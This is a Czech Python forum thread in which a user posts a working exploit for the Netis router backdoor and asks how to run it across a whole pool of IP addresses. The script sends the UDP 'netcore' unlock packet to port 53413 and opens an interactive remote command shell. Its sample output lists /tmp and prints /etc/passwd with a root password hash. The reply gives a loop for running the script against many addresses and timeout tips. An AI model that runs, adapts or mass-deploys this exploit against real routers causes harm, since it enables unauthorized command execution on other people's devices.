Python script exploit

Python script exploit

~ Anonymní uživatel
~ 1 příspěvek

24. 5. 2017 #1

Ahoj pythonaci :-),

mám script, kterým bych potřeboval otestovat zranitelnost viz. níže, ale jde o to, že potřebuju projít celý pool IP adress, tedy ne pouze jednu (na kterou je scrip připrave). Jelikož spojení je iniciováno na UDP transportu, potřeboval bych na záver skriptu, poslat například příkaz "ls" a pokud druhá straná do 2 vteřin neodpoví, pokračovat na další IP adresu.

python script:


import socket
import argparse
import binascii
'''
Example run:
root@rageKali:/media/veracrypt1/stcyr/git/MSF-Testing-Scripts# python netis_backdoor.py 192.168.1.1
Unlocking Backdoor
Quit to quit loop
Netis> ls /tmp/
AuCVM
XqdHc
bVOQm
br_type
bridge_init
cfg-macclone
checkupfile
ddfile
default_rt
dhcpd_action
file.txt
hzbjo
igd_config.old
jiDOo
log
ntp_tmp
passwd
reg_domain
syslogd_support
tmp.txt
update_main
version
wan_type
workmode
Netis> cat /etc/passwd
root:abSQTPcIskFGc:0:0:root:/:/bin/sh
nobody:x:99:99:Nobody:/:
'''
parser = argparse.ArgumentParser(description='Netis backdoor')
parser.add_argument('IP', help='IP of router to connect to')
args = parser.parse_args()
def send(command, print_response = True):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#s.connect((args.IP, 53413))
s.sendto("AA\x00\x00AAAA%s\x00" %(command), (args.IP, 53413))
if print_response:
resp = s.recv(2048)
resp = resp[8:]
if binascii.hexlify(resp) == "000000ff":
print("No response, command not found or error in command")
else:
print(resp)
def login():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#s.connect((args.IP, 53413))
s.sendto("AAAAAAAAnetcore\x00", (args.IP, 53413))
print("Unlocking Backdoor")
login()
input = ""
print("Quit to quit loop")
input = raw_input("Netis> ").strip()
while not input.strip().upper() in ["QUIT","EXIT"]:
send(" " + input)
input = raw_input("Netis> ").strip()

Pomohl by mi s tím někdo, prosim ? Pro znalce Pythona to bude asi na deset minut...

IP adresy klidne mužou byt vyčítany z externího .txt, řádek po řádku, jestli je to jednodušší, než řešit ve skriptu generovaní ip adres dle poolu.

Děkuji.

Nahlásit jako SPAM

IP: 94.74.192.–

gna

~ Anonymní uživatel
~ 1891 příspěvků

25. 5. 2017 #2

Pro více adres to stačí opakovaně spouštět.

./generujadresy | while read IP; do ./skript "$IP"; done

Na timeout můžeš použít socket.settimeout, nebo select.select.

Nahlásit jako SPAM

IP: 213.211.51.–

Přidej příspěvek

Toto téma je starší jak čtvrt roku – přidej svůj příspěvek jen tehdy, máš-li k tématu opravdu co říct!

Ano, opravdu chci reagovat → zobrazí formulář pro přidání příspěvku

×Vložení zdrojáku

×Vložení obrázku

Vložit URL obrázku Vybrat obrázek na disku

Klikni a vyber obrázek z počítače:

×Vložení videa

Aktuálně jsou podporována videa ze serverů YouTube, Vimeo a Dailymotion.

Jméno: *

Twitter: bez zavináče

Avatar:

Podporujeme Gravatara.

Zadej URL adresu Avatara (40 x 40 px) nebo emailovou adresu pro použití Gravatara.
Email nikam neukládáme, po získání Gravatara je zahozen.

Tvůj text: *

Zdrojový kód Vložit obrázek Video Smajlíci

Pravidla pro psaní příspěvků, používej diakritiku. ENTER pro nový odstavec, SHIFT + ENTER pro nový řádek.

Sledovat nové příspěvky (pouze pro přihlášené)

Sleduj vlákno a v případě přidání nového příspěvku o tom budeš vědět mezi prvními.

Reaguješ na příspěvek:

Uživatelé prohlížející si toto vlákno

Uživatelé on-line: 0 registrovaných, 8 hostů

Python script exploit – Python – Fórum – Programujte.com

Fórum › Python

Přidej příspěvek

×Vložení zdrojáku

×Vložení obrázku

×Vložení videa

Uživatelé prohlížející si toto vlákno

Podobná vlákna

Python-zavirani oken v python shell — založil Daniel zita

Script — založil papajohn

Action Script 3 — založil Majox

Script-Mysql — založil Václav Žitek

Script jquery — založil Paja2

Moderátoři diskuze